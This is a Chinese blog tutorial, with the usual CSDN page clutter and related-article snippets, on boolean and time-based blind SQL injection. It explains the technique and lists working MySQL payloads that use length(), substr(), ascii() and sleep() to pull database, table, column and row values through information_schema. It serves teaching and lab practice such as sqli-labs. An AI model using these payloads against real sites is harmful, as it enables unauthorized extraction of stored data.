web ------ SQL注入------盲注

最新推荐文章于 2022-09-16 13:24:43 发布
最新推荐文章于 2022-09-16 13:24:43 发布
阅读量238 收藏
点赞数
分类专栏: web 0-1 文章标签: sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ckk1314520/article/details/125900069
版权

什么是盲注?

有时目标存在注入,但是页面上没有任何回显,此时,我们需要利用一些方法进行判断或者尝试得到数据,这个过程称之为盲注。

盲注种类

布尔盲注

布尔很明显TureFales,也就是说它只会根据你的注入信息返回TureFales,也就没有了之前的报错信息

时间盲注

界面返回值只有一种,ture无论输入任何值 返回情况都会按正常的来处理。加入特定的时间函数,通过查看web页面返回的时间差来判断注入的语句是否正确

盲注函数解析

length()函数 返回字符串的长度

?id=1 and length(database())>1

limit 0,1 显示第一字符

substf()截取字符串

id=1 and substr(database(),1,1)='k'

第一个参数代表的是截取的字符串

第二个参数代表的是截取的位数

第三个参数代表的是截取的个数

and length(database())=12

判断库名长度

and substr(database(),1,1)='k'

and ascii(substr(database(),1,1))>1

判断当前数据库名称

and length((select table_name from information_schema.tables where table_schema=database() limit 0,1))=6

and substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)='l'

判断数据库中的表名

and substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1,1)='i'

判断字段名

and (ascii(substr((select id from scurity.users limit 0,1),1,1)))=122

判断字段数据

ord()/ascii()返回字符的ascii码

id=1 and ord(substr(database(),1,1))=107

时间型

sleep()将程序挂起一段时间 n为n秒

if(expr1,expr2,expr3)判断语句 如果第一个语句正确 就执行第二个语句,如果错误 执行第三个语句

id=1' and if(length(database())=8,1,sleep(5)) --+

@See you later
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
超级SQL注入工具-web-sql
10-28
超级SQL注入工具是一款基于HTTP协议自组包的SQL注入工具,支持出现在HTTP协议任意位置的SQL注入,支持各种类型的SQL注入 支持Bool型盲注、错误显示注入、Union注入,支持Access、MySQL5以上版本、SQLServer、Oracle...
web安全 sql盲注和报错注入
m0_68167825的博客
06-13 764
可以基于这个函数,实现盲注。 例: 输入1’ and length(database())>3 – -得到了结果没有报错,所以可以得到数据库名字节数大于3, 输入1’ and length(database())>4 – -得到了结果报错,所以得到数据库名字节数不大于4, 输入1’ and length(database())=4 – -得到结果没报错,所以得到数据库名字节数为4.根据这两个函数得作用,来做盲注猜测。 输入1’ and ascii(substr(database(),1,1))>99 –
WEB渗透之SQL盲注
weixin_43853965的博客
03-12 332
漏洞等级:高 漏洞风险:会使攻击者远程查看、修改或删除数据库内条目和表单 N-Base分类:远程命令执行----SQL注入 漏洞描述: SQL注入是一种WEB程序的漏洞,通过注射,攻击者可以获得数据库中存储的数据,造成机密数据的外泄。SQL注入攻击(SQL injection),是发生于应用程序至数据库层的安全漏洞。简而言之,是在输入的数据字符串之中夹带SQL指令,在安全不达标的程序中,开发者忽略...
WEB新手之布尔盲注
weixin_33971130的博客
04-29 122
  开始写SQL的题,单引号等特殊符号闭合漏洞比较简单,因此从Less-5开始写。   布尔盲注是多种盲注的一种,这种盲注方法也比较好理解。但使用这种盲注有一个前提,就是网页会有回显,透过这个回显,我们可以通过判断,来获得所需的信息。   以Less-5为例题,如图所示:   加上id=1,会发现这样的回显,如图所示:   然后利用Less-1~4的知识,发现这里的语句...
WEB漏洞攻防 - SQL注入 - 盲注
易编橙 · 终身成长社群,相遇已是上上签!
07-29 814
盲注就是在注入过程中,获取的数据不能回显至前端页面。此时,我们需要利用一些方法进行判断或者尝试,这个过程称之为盲注。我们可以知道盲注分为以下三类:[这里介绍的是基于MYSQL的函数,其他类型的数据库思路相同,仅函数上有些许差异]
Web渗透_SQL盲注
分享学习网络的点点滴滴
08-09 324
不显示数据库内建的报错信息内建的报错信息帮助开发人员发现和修复问题报错信息提供关于系统的大量有用信息当程序员隐蔽了数据库内建报错信息,替换为通用的报错提示,sql注入将依据报错信息判断注入语句的执行结果,即盲注思路:既然无法基于报错信息判断结果,那就基于逻辑真假的不同结果来判断如果是真的话,会返回参数,如果是假的不会报错,逻辑语句被执行,证明有sql注入漏洞。...
SQL注入技巧-盲注暴库详细技巧及实例
10-11
个人通过拜读各位前辈们的博文以及大量的ctf题目训练,结合挖洞经验整理的几点sql常用的盲注技巧,结合具体的sql指令加深理解,针对常用的防护技术,总结了几种通用的绕过技巧
mySQLenum-开源
07-29
mySQLenum 是一个命令行自动盲注 sql 注入工具,用于使用 MySql 服务器作为其后端的 Web 应用程序。 它的主要目标是提供一个易于使用的命令行界面。
DVWA靶场环境---新手入坑
10-28
DVWA靶场环境---新手学习web安全的必备靶场之一,DVWA (Dam Vulnerable Web Application)是用PHP+Mysql编写的一套用于常规WEB漏洞教学和检测的WEB脆弱性测试程序。包含了SQL注入、XSS、盲注等常见的一些安全漏洞。
第16天:WEB漏洞-SQL注入之查询方式及报错盲注1
08-03
Access 偏移注入:解决列名获取不到的情况查看登陆框源代码的表单值或观察 URL 特征等也可以针对表或列获取不到的情况select 查询数据在网站应用中进行
4-Web安全——SQL盲注
网络安全
05-23 729
1. SQL盲注 在进行SQL注入过程中,如果当前页面没有报错回显,无法获取数据库返回结果的情况下,可以通过SQL盲注的方式对数据库中的内容进行猜解,盲注类型主要分为:布尔盲注和时间盲注。 当web页面只返回真假(true或false)两种不同类型的结果情况下,利用页面返回的不同类型结果逐个猜解数据,就可以使用布尔盲注,如果web页面不返回true或false类型的结果,则可以使用时间注入。 真实的注入环境中,web页面肯定不会直接回显true或false的,一般来说可以根据页面返回的结果作为依.
WEB安全实战(一)SQL盲注
热门推荐
紫羽风的博客
10-30 3万+
前言 好长时间没有写过东西了,不是不想写,只不过是一直静不下心来写点东西。当然,拖了这么长的时间,也总该写点什么的。最近刚刚上手安全方面的东西,作为一个菜鸟,也本着学习的目的,就谈谈最近接触到的安全方面的问题吧。 背景 既然提到了背景,那我们就简单的带一下,最近互联网上爆出了各种惊人的事件、各种门、各种照的,归根结底,都是网络安全出的问题,有的是网络被别人监控
WebGoat——盲注
OOM
08-14 2056
工具介绍:盲注可以通过人工去做,但是成本太高,Webgoat提供一个工具Simple JHijack(下载地址),通过与Tamper Data(使用方法)的结合使用,能够完成部分盲注。 界面介绍: 具体的实施 1、Webgoat——Blind Numeric SQL Injection The form below allows a user to enter an account
web安全入门(第四章-4)盲注注入
Yzz_的博客
05-26 336
一、盲注介绍 所谓盲注就是在服务器没有错误回显的时候完成的注入攻击。 服务器没有错误回显,对于攻击者来说缺少了非常重要的“调试信息”。 布尔盲注 布尔很明显trup跟fales,也就是说他只会根据你的诸如信息 返回trup跟fales,也就没有了之前的报错信息。 时间盲注 界面返回值只有一种,trup无论输入任何值,返回情况都会按 正常的来处理。加入特定的时间函数,通过查看web页面返回的时间差 来判断注入的语句是否正确。 二、盲注需要掌握的几个函数 length
初学Web安全之sql注入(四)—— 盲注(1)
weixin_47531846的博客
12-03 196
盲注 当你的输入没有回显,也没有报错的时候,但是输入正确和错误的值时,页面有不同表现时,这时候我们可以尝试使用布尔盲注 布尔盲注sqli-labs第八关来举列 首先输入id=1,页面显示如下: 输入id=1’,页面出现不同结果,判断有闭合: 再次输入id=1",页面结果显示正常,初步判断语句闭合为单引号闭合: 接下来,我们就可以先尝试判断当前数据库的长度,然后再拆解表名,但是这里省略这一步,直接判断当前数据库有多少个表,构造语句开始尝试: PS:因为手工注入非常的耗费时间,所以我这里采用半自动
webbug php盲注,CTF-WEB 一个登录框SQL盲注
weixin_36012215的博客
03-28 189
标签下的内容 没办法 又去学习一下“美丽的汤”Beautifulsoup 解析网页首先放上一段测试代码:# -*- coding:utf-8 -*-from bs4 import BeautifulSoupimport requestssession = requests.Session()paramsPost = {"password":"1","username":"admin"}hea...
WEB安全-SQL注入
weixin_56319791的博客
09-16 1736
SQL注入漏洞
webSQL注入篇BUU
m0_57379855的博客
04-08 3063
webSQL注入篇BUU[极客大挑战 2019]EasySQL1万能密码[强网杯 2019]随便注预处理语句handler [极客大挑战 2019]EasySQL1 万能密码 用户名:admin 密码:1’ or 1=1 # [强网杯 2019]随便注 万能密码 order by 排序 union select 1,2; show databases; show tables; 预处理语句 prepare…from…是预处理语句,会进行编码转换。 execute用来执行由SQLPrepa
WEB注入类题目解析
qq_39607945的博客
08-01 379
后台登陆-实验吧 链接: http://ctf5.shiyanbar.com/web/houtai/ffifdyop.php 考点:利用MD5注入sql语句,绕过对关键字(or)的过滤 查看源代码发现: 其实链接中的ffifdyop的MD5值就是我们可以满足绕过的hash值:276f722736c95d99e921722cf9ed621c。是十六进制表示的,decode之后是’or’6,or之后...
sqli-labs靶场通关
最新发布
08-25
对于sqli-labs靶场的通关,你需要具备一定的SQL注入的知识和技巧。以下是一些通关的步骤和提示: 1. 确保你已经安装了LAMP/WAMP/MAMP服务器环境,并将sqli-labs源码解压到Web服务器的根目录下。 2. 打开浏览器,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值